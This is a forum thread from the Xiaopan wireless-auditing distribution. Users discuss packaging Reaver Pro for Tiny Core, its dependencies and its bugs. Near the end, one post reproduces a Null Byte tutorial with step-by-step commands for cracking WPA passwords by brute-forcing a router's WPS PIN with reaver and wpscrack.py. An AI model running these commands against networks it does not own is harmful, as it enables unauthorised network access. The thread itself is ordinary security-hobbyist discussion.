Please try the new Xiaopan 0.4.5. Click Here sy I am in the process of getting a tcz file made for tiny core so we can have a option of automate wps stuff using reaver pro in xiaopan. So Far.. I got Firefox and Chromium installed so i can use Firefox for the reaver pro just working on some of the dependencies so i can make a tcz dependency file so people that work with tiny core know the dependencies needed and any conflicts ; but any help or advice from the community is totally acceptable and credit will be given and listed in this topic of the member(s) that help
Just letting you know if you didn't, but Reaver Pro uses the following resources: • Nginx (http proxy server) • Django (Python framework) • Reaver (durrr) I wonder if HoT_Pursuit could assist
Thanks I was trying to figure that part out now just got to make everything work; and HoT_Pursuit hopefully an chime in on this cause i know that in post https://xiaopan.co/forums/bookmarks/?post_id=2180 it has been slimmed down to 50mb
how the project going..? any good news..? i think it not impossible.. and can be done.. if you already code it, can xiaopan member be the first to try to test it..? haha.. share the tcz file in here first then you can submit to tcl repo jk
i'm having a problem at the moment with make an all in one tcz, but it will be released here first and a beta will be made for vip's as soon as it is stable enough then 7 days after a full release will be done if there are no problems
I like Reaver Pro, but there are some bugs that develop over time. It does whatsa it says, but becomes unstable after some use. --- Double Post Merged, 14 Oct 2012 --- The Reaverr Pro is nice, and it does what says, but it will stop working you put the usb in another computer. Hak Shop is friendly and stand by their selling products, Reaver Pro is still unstable release. but TNS refuses to answer any question ever.
the tinycore version provides the http interface but it doesn't actually work. I guess more testing is needed. --- Double Post Merged, 15 Nov 2012 --- if someone can help and do better than me i will donate yo xiopan a dollar for every mb of data the tcz holds
Yes, I would like Reaver Pro, if it is stable. --- Double Post Merged, 15 Nov 2012 --- Reaver Pro Tech password is reaver, but I think it causes problems when accessed by sudo command, sudo passwd root.
The firefox gui is unstable, and it requires high level attention beyond my current capabilities. It may be unstable purposely, only a few know the answer. --- Double Post Merged, 15 Nov 2012 --- Is there anything besides reaver that can tackle wps? It is the only one I know efficienty doing so...
Reaver pro's original intention is to make Pentest boxes...Integrating it in Xiaopan without :censored up whole distro will not be easy...Best thing to do is to cancel whole thing....
How to Hack WPA WiFi Passwords by Cracking the WPS PIN Requirements Linux OS A router at home with WPS The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev Tools Reaver (support for all routers) search for "reaver-1.3.tar.gz on the web" wpscrack (faster, but only support for major router brands) seach for "wpscrack on the web" Crack WPS Text in bold below is a terminal command. Follow the guide that corresponds to the tool that you chose to use below. Reaper Unzip Reaver. unzip reaver-1.3.tar.gz Change to the Reaper directory. cd reaver-1.3 Configure, compile and install the application. ./configure && make && sudo make install Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX). sudo iwlist scan wlan0 Set your device into monitor mode. sudo airmon-ng start wlan0 Run the tool against an access point. reaver -i mon0 -b <MA:CAD:RE:SS:XX> -vv Wait until it finishes. This tool makes it too easy. wpscrack.py Make the program an executable. chmod +x wpscrack.py Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX). sudo iwlist scan wlan0 Get your MAC address, save it for later. ip link show wlan0 | awk '/ether/ {print $2}' Set your device into monitor mode. sudo airmon-ng start wlan0 Attack your AP. wpscrack.py –iface mon0 –client <your MAC, because you're attacking yourself, right?> –bssid <AP MAC address> --ssid <name of your AP> -v Await victory. --- Double Post Merged, 8 Feb 2013 --- A flaw in WPS, or WiFi Protected Setup, known about for over a year by TNS, was finally exploited with proof of concept code. Both TNS, the discoverers of the exploit and Stefan at .braindump have created their respective "reaver" and "wpscrack" programs to exploit the WPS vulnerability. From this exploit, the WPA password can be recovered almost instantly in plain-text once the attack on the access point WPS is initiated, which normally takes 2-10 hours (depending on which program you use). This exploit defeats WPS via an intelligent brute force attack to the static WPS PIN. By guessing the PIN, the router will actually throw back, whether or not the first four digits (of eight) are correct. Then, the final number is a checking number used to satisfy an algorithm. This can be exploited to brute force the WPS PIN, and allow recovery of the WPA password in an incredibly short amount of time, as opposed to the standard attack on WPA. In this Null Byte, let's go over how to use both tools to crack WPS. As of yet, no router is safe from this attack, and yet none of the vendors have reacted and released firmware with mitigations in place. Even disabling WPS still allows this attack on most routers. source-- http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/